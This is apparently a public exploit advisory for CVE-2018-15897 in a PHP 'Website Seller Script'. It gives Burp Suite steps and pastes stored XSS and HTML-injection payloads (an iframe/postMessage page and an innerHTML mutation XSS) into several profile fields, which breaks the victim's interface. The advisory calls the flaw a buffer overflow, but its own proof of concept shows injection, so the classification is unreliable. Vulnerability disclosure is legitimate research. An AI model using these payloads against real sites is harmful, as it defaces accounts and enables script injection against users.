*******************************************************************************
# Exploit Title: Website Seller Script – 2.0.5 – has Buffer Overflow
# Date: 09.08.2018
# Site Titel : BUSINESS SALE
# Vendor Homepage: https://www.phpscriptsmall.com/
# Vendor Product : https://www.phpscriptsmall.com/product/website-seller-script/
# Product Link: http://www.officialwebsiteforsale.com/
# Category: Web Application
# Version: 2.0.5
# Exploit Author: Vikas Chaudhary
# Contact: https://gkaim.com/contact-us/
# Web: https://gkaim.com/
# Published on:
# Tested on: Windows 10 -Firefox
# CVE-2018-15897.

*******************************************************************************

## VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide
range of innovative. PHP Scripts Mall is a leading business and technology firm with 12 years of
successful track record in completion and implementation of numerous projects in various
verticals and domains.. It has 300 plus PHP scripts ready to buy.

## VULNERABILITY DESCRIPTION :- Buffer overflow occurs when a program tries to store more data in a
temporary storage area than it can hold. Writing outside the allocated memory area can corrupt the
data, crash the program or cause the execution of malicious code that can allow an attacker
to modify the target process address space.

*******************************************************************************
PoC:-
1- Goto Vendor Product Link => Choose User Demo
2- Create an account using your mail and pasword and soo on (Choose User Type =>Buyer )
3-Verify you mail id and loged in to site
4- Open Burp Suite and make intercept on
5- Go to Dashboard => Profile => Edit Account => and fill the form as you want and click on save
6- Burp will capture the Data – Rename the given parameter with given code and Forward it.

In First name => <!DOCTYPE html> <body onload="crossPwn()"> <h2>VIKAS</h2><iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>" name="<?php echo $_GET['name'] ?>" height="0" style="visibility:hidden"></iframe> <script> function crossPwn() { frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); // onresize document.getElementsByTagName('iframe')[0].src = '<?php echo $_GET["target"] ?>' + '#brute'; // onhashchange } </script> </body> </html>
In Last Name => <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
In Personal Address => <!DOCTYPE html> <body onload="crossPwn()"> <h2>VIKAS</h2><iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>" name="<?php echo $_GET['name'] ?>" height="0" style="visibility:hidden"></iframe> <script> function crossPwn() { frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); // onresize document.getElementsByTagName('iframe')[0].src = '<?php echo $_GET["target"] ?>' + '#brute'; // onhashchange } </script> </body> </html>
In Company Name => <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
In Fax => <!DOCTYPE html> <body onload="crossPwn()"> <h2>VIKAS</h2><iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>" name="<?php echo $_GET['name'] ?>" height="0" style="visibility:hidden"></iframe> <script> function crossPwn() { frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); // onresize document.getElementsByTagName('iframe')[0].src = '<?php echo $_GET["target"] ?>' + '#brute'; // onhashchange } </script> </body> </html>
In Address=> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

7- You will see that your web interface will totally change and after that you can’t be able to change or edit you profile .

My Previous CVE (Visit Once)…

CVE-2018-15896

CVE-2018-15191 , CVE-2018-15190 , CVE-2018-15189

CVE-2018-15188 , CVE-2018-15187 , CVE-2018-15186

CVE-2018-15185 , CVE-2018-15184 , CVE-2018-15183

CVE-2018-15182 , CVE-2018-15181 , CVE-2018-14541

CVE-2018-14082 , CVE-2018-13256 , CONTACT US